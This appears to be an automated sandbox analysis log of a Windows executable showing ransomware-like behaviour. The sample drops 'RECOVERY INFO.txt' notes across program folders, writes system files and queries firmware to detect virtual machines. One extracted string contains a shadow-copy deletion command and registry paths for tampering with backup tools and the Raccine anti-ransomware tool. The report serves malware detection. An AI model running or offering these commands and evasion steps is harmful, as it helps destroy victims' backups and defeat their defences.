Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: 2b7cu0KwZl.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 2b7cu0KwZl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2b7cu0KwZl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2b7cu0KwZl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2b7cu0KwZl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2b7cu0KwZl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2b7cu0KwZl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 2b7cu0KwZl.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 2b7cu0KwZl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2b7cu0KwZl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2b7cu0KwZl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2b7cu0KwZl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2b7cu0KwZl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2b7cu0KwZl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Persistence and Installation Behavior

barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
Source: 2b7cu0KwZl.exeBinary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\7-Zip\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessibility\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\AutoItX\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Java\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office Tools\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\System Tools\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\System Tools\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\user\Start Menu\Programs\Accessibility\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\user\Start Menu\Programs\Accessories\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\user\Start Menu\Programs\System Tools\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\user\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txtJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe TID: 2520Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe TID: 396Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Cache\Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093411-7-7f-19041.1.amd64fre.vb_release.191206-1406.etlJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
